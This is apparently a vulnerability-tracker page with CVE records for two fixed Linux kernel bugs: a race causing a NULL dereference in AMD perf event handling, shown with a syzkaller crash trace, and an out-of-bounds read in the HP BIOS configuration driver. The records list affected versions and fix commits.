"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:36.755Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/49324a0c40f7e9bae1bd0362d23fc42232e14621"
},
{
"url": "https://git.kernel.org/stable/c/6e41d9ec8d7cc3f01b9ba785e05f0ebef8b3b37f"
},
{
"url": "https://git.kernel.org/stable/c/e1028fb38b328084bc683a4efb001c95d3108573"
},
{
"url": "https://git.kernel.org/stable/c/43c2e5c2acaae50e99d1c20a5a46e367c442fb3b"
},
{
"url": "https://git.kernel.org/stable/c/866cf36bfee4fba6a492d2dcc5133f857e3446b0"
}
],
"title": "perf/x86/amd: Check event before enable to avoid GPF",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68798",
"datePublished": "2026-01-13T15:29:08.329Z",
"dateReserved": "2025-12-24T10:30:51.042Z",
"dateUpdated": "2026-01-14T08:51:36.755Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71101 (GCVE-0-2025-71101)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing
Summary
In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing
The hp_populate_*_elements_from_package() functions in the hp-bioscfg
driver contain out-of-bounds array access vulnerabilities.
These functions parse ACPI packages into internal data structures using
a for loop with index variable 'elem' that iterates through
enum_obj/integer_obj/order_obj/password_obj/string_obj arrays.
When processing multi-element fields like PREREQUISITES and
ENUM_POSSIBLE_VALUES, these functions read multiple consecutive array
elements using expressions like 'enum_obj[elem + reqs]' and
'enum_obj[elem + pos_values]' within nested loops.
The bug is that the bounds check only validated elem, but did not consider
the additional offset when accessing elem + reqs or elem + pos_values.
The fix changes the bounds check to validate the actual accessed index.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
e6c7b3e15559699a30646dd45195549c7db447bd , < cf7ae870560b988247a4bbbe5399edd326632680
(git)
Affected: e6c7b3e15559699a30646dd45195549c7db447bd , < db4c26adf7117b1a4431d1197ae7109fee3230ad (git) Affected: e6c7b3e15559699a30646dd45195549c7db447bd , < 79cab730dbaaac03b946c7f5681bd08c986e2abd (git) Affected: e6c7b3e15559699a30646dd45195549c7db447bd , < e44c42c830b7ab36e3a3a86321c619f24def5206 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/platform/x86/hp/hp-bioscfg/enum-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/int-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/order-list-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/passwdobj-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/string-attributes.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cf7ae870560b988247a4bbbe5399edd326632680",
"status": "affected",
"version": "e6c7b3e15559699a30646dd45195549c7db447bd",
"versionType": "git"
},
{
"lessThan": "db4c26adf7117b1a4431d1197ae7109fee3230ad",
"status": "affected",
"version": "e6c7b3e15559699a30646dd45195549c7db447bd",
"versionType": "git"
},
{
"lessThan": "79cab730dbaaac03b946c7f5681bd08c986e2abd",
"status": "affected",
"version": "e6c7b3e15559699a30646dd45195549c7db447bd",
"versionType": "git"
},
{
"lessThan": "e44c42c830b7ab36e3a3a86321c619f24def5206",
"status": "affected",
"version": "e6c7b3e15559699a30646dd45195549c7db447bd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/platform/x86/hp/hp-bioscfg/enum-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/int-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/order-list-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/passwdobj-attributes.c",
"drivers/platform/x86/hp/hp-bioscfg/string-attributes.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:59.717Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cf7ae870560b988247a4bbbe5399edd326632680"
},
{
"url": "https://git.kernel.org/stable/c/db4c26adf7117b1a4431d1197ae7109fee3230ad"
},
{
"url": "https://git.kernel.org/stable/c/79cab730dbaaac03b946c7f5681bd08c986e2abd"
},
{
"url": "https://git.kernel.org/stable/c/e44c42c830b7ab36e3a3a86321c619f24def5206"
}
],
"title": "platform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71101",
"datePublished": "2026-01-13T15:34:59.717Z",
"dateReserved": "2026-01-13T15:30:19.651Z",
"dateUpdated": "2026-01-13T15:34:59.717Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…